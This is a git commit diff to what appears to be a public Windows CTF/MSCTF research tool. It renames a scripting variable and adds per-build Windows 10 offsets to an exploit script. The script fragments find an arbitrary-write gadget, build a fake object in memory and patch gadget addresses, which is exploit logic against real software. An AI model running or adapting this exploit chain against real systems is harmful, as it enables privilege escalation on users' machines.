
support more win10 versions

taviso committed Jul 12, 2019
1 parent 1e73fbe commit a77d46a8a7bc6baf554159752ba7480c32857cfd
Showing with 25 additions and 12 deletions.
  1. +3 −4 command.c
  2. +1 −1 commanddoc.h
  3. +21 −7 scripts/ctf-exploit-common-win10.ctf
@@ -135,7 +135,7 @@ ULONGLONG DecodeIntegerParameter(PCHAR Value) {
{ "rc", "Return code of last run command.", LastCommandResult },
{ "regval", "The last value queried from the registry.", LastRegistryValue },
{ "gadget", "Result of the last gadget found.", LastGadget },
{ "section", "Result of the last section property query.", LastSectionResult }
{ "secval", "Result of the last section property query.", LastSectionResult }
};

// Check if the caller is requesting help.
@@ -1436,12 +1436,11 @@ ULONG RegHandler(PCHAR Command, ULONG ParamCount, PCHAR *Parameters)

if (Result != ERROR_SUCCESS) {
LogMessage(stdout, "Failed to query %s, %#x", Subkey, Result);
LastRegistryValue = -1;
return 1;
}

if (!NonInteractive) {
LogMessage(stdout, "%s is %u", Parameters[1], Value);
}
LogMessage(stdout, "%s is %u", Parameters[1], Value);

LastRegistryValue = Value;

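Review bot: The scripting-variable table in the first command.c hunk replaces the `section` entry with `secval` and keeps no alias for the old name, so any script written against the previous build that reads `section` no longer resolves that variable; the repository's own script is updated in this commit, but scripts outside it are not. The commit does not say why the variable was renamed — presumably it collided with the `section` command of the same name when a script referenced it — and a reader of the table has no way to recover that, so a comment on the new entry would help, e.g. `// Named "secval" rather than "section" so the variable does not collide with the section command.` The same rename appears in the commanddoc.h hunk and throughout the script hunks, so it is not repeated there. The table starts before the hunk, and RegHandler in the second hunk both starts and ends outside it.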
@@ -409,7 +409,7 @@ static const char SectionDoc[] =
"Parse the section header of MODULE, find a section named SECTIONNAME and\n"
"print the value of PROPERTY. PROPERTY should be a member of\n"
"IMAGE_SECTION_HEADER, such as VirtualAddress.\n\n"
"The result is stored in the section variable for scripting.\n\n"
"The result is stored in the secval variable for scripting.\n\n"
"Examples:\n"
" ctf> section kernel32 .text PointerToRawData\n";

@@ -6,6 +6,8 @@
# 00007ffd`1aee6440 MSCTF!CTipProxy::Reconvert
reg HKLM ReleaseId SOFTWARE\Microsoft\Windows NT\CurrentVersion

set r3 475

set r0 1903
eq r0 regval
repeat r0 set r3 480
@@ -14,6 +16,18 @@ set r0 1809
eq r0 regval
repeat r0 set r3 496

set r0 1803
eq r0 regval
repeat r0 set r3 553

set r0 1709
eq r0 regval
repeat r0 set r3 452

set r0 1703
eq r0 regval
repeat r0 set r3 401

# Find offset of msvcrt!_init_time from msvcrt base. This is our arbitrary write
# gadget.
gadget msvcrt 48895C240848896C2410574883EC2083
@@ -22,15 +36,15 @@ set r4 gadget
# We need to adjust the offset based on the section headers to guess where it
# will be loaded.
section msvcrt .text VirtualAddress
add r4 section
add r4 secval
section msvcrt .text PointerToRawData
sub r4 section
sub r4 secval

# Offset of slack space in kernel32 .data section. This is where we build our
# fake object in memory. It doesn't have to be kernel32, any module with some
# writable space that is always zero is fine.
section kernel32 .data VirtualAddress
set r5 section
set r5 secval
add r5 0x1008

# There is a bug in how methods are called on what CTF calls "stubs", essentially
@@ -195,9 +209,9 @@ add r2 gadget

# Adjust the file offset based on the section headers.
section msctf .text VirtualAddress
add r2 section
add r2 secval
section msctf .text PointerToRawData
sub r2 section
sub r2 secval

# Alright, lets paste this sucker in.
patch 0 0xa8 r0 8 -0x158
@@ -541,9 +555,9 @@ set r1 gadget

# Adjust the file offset based on the section headers.
section combase .text VirtualAddress
add r1 section
add r1 secval
section combase .text PointerToRawData
sub r1 section
sub r1 secval

patch 0 0x40 module 8 r1
